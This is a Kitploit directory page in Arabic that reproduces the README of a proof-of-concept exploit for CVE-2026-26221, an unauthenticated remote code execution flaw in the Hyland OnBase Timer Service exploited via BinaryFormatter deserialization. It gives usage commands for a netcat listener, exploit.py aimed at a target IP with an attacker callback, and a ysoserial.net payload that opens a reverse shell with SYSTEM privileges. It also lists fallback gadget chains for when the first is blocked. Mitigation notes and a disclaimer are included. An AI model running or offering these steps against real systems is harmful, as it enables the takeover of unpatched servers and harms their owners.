Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE — إثبات مفهوم لاستغلال تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في خدمة المؤقت Hyland OnBase عبر إلغاء تسلسل BinaryFormatter في .NET Remoting، مع تحقيق صلاحيات SYSTEM. | Kitploit
أدوات/GitHubGitHub/mbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubmbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce

CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE

إثبات مفهوم لاستغلال تنفيذ التعليمات البرمجية عن بُعد دون مصادقة في خدمة المؤقت Hyland OnBase عبر إلغاء تسلسل BinaryFormatter في .NET Remoting، مع تحقيق صلاحيات SYSTEM.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد
مشاركة

📡 ثغرة تنفيذ الأوامر عن بُعد غير المصادق عليها في خدمة مؤقت Hyland OnBase

Mohammed Idrees Banyamer

باحث أمني

الأردن 🇯🇴

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 نظرة عامة

يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لثغرة تنفيذ الأوامر عن بُعد غير المصادق عليها في خدمة مؤقت Hyland OnBase عبر إلغاء تسلسل غير آمن لـ .NET Remoting BinaryFormatter.

تسمح الثغرة لمهاجم غير مصادق بإرسال حمولة BinaryFormatter مصممة خصيصًا إلى نقطة نهاية خدمة المؤقت وتنفيذ أوامر عشوائية بصلاحيات NT AUTHORITY\SYSTEM.

  • المنتج: خدمة مؤقت Hyland OnBase Workflow / Workview
  • المنفذ: 8900/TCP
  • المصادقة: غير مطلوبة
  • التأثير: تنفيذ أوامر عن بُعد
  • الصلاحيات: SYSTEM
  • CVE: CVE‑2026‑26221
  • CVSS: 9.8 (حرجة)

⚙️ التفاصيل الفنية

تعرض خدمة المؤقت نقطة نهاية .NET Remoting:

root@kitploit:~
http://TARGET:8900/TimerServiceAPI.rem

تقبل الخدمة كائنات BinaryFormatter غير مصادق عليها. من خلال توفير سلسلة أدوات خبيثة (ysoserial.net)، يحدث تنفيذ أوامر عشوائي أثناء إلغاء التسلسل.


📦 المتطلبات

  • Python 3
  • requests
  • ysoserial.net
  • مستمع netcat
  • بيئة توليد حمولة Windows (Windows / Mono / Wine)

تثبيت تبعية Python:

root@kitploit:~
pip install requests

تنزيل ysoserial.net:

root@kitploit:~
git clone https://github.com/pwntester/ysoserial.net

🚀 الاستخدام

1️⃣ تشغيل المستمع

root@kitploit:~
nc -lvnp 4444

2️⃣ تشغيل الاستغلال

root@kitploit:~
python3 exploit.py 192.168.10.50 --lhost 192.168.1.100 --lport 4444

3️⃣ توليد الحمولة

يطبع السكربت أمر ysoserial. قم بتشغيله في طرفية أخرى (Windows / Mono):

root@kitploit:~
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "powershell ..." -o raw > rev_shell.bin

4️⃣ إرسال الحمولة

اضغط ENTER في طرفية الاستغلال بعد توليد الحمولة.

إذا كان النظام عرضة للثغرة ← سيتم الاتصال بالصدفة العكسية.


🧪 مثال

root@kitploit:~
python3 exploit.py 10.10.10.123 --lhost 192.168.5.77 --lport 9001

🔧 الخيارات

الخيارالوصف
targetعنوان IP أو اسم المضيف الهدف
--portمنفذ خدمة المؤقت (الافتراضي 8900)
--endpointTimerServiceAPI.rem / TimerServiceEvents.rem
--lhostعنوان IP للمهاجم
--lportمنفذ المستمع
--gadgetسلسلة أدوات ysoserial

🧯 ملاحظات

  • الاستغلال أعمى

  • النجاح = استدعاء صدفة عكسية

  • تعمل الخدمة بصلاحيات SYSTEM

  • جرب سلسلة أدوات بديلة إذا تم الحظر:

    • TextFormattingRunProperties
    • ObjectDataProvider

🛡️ التخفيف

  • تطبيق تصحيحات النشرة الأمنية OB2025‑03 من Hyland
  • تعطيل تعرض .NET Remoting
  • تقييد الوصول إلى المنفذ 8900
  • مراقبة استخدام BinaryFormatter

📊 مخطط تدفق هجوم PoC

root@kitploit:~
sequenceDiagram
    participant A as المهاجم
    participant Y as ysoserial.net
    participant T as خدمة مؤقت OnBase الهدف
    participant S as صدفة SYSTEM

    A->>A: تشغيل مستمع netcat
    A->>Y: توليد حمولة BinaryFormatter
    Y-->>A: rev_shell.bin
    A->>T: HTTP POST /TimerServiceAPI.rem
    T->>T: BinaryFormatter.Deserialize()
    T->>S: تنفيذ سلسلة الأدوات
    S-->>A: اتصال الصدفة العكسية

⚠️ إخلاء المسؤولية

يتم توفير هذا الاستغلال من أجل:

  • البحث الأمني
  • اختبار الاختراق المصرح به
  • التحقق الدفاعي

الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن باختبارها غير قانوني.


تنزيل الأداة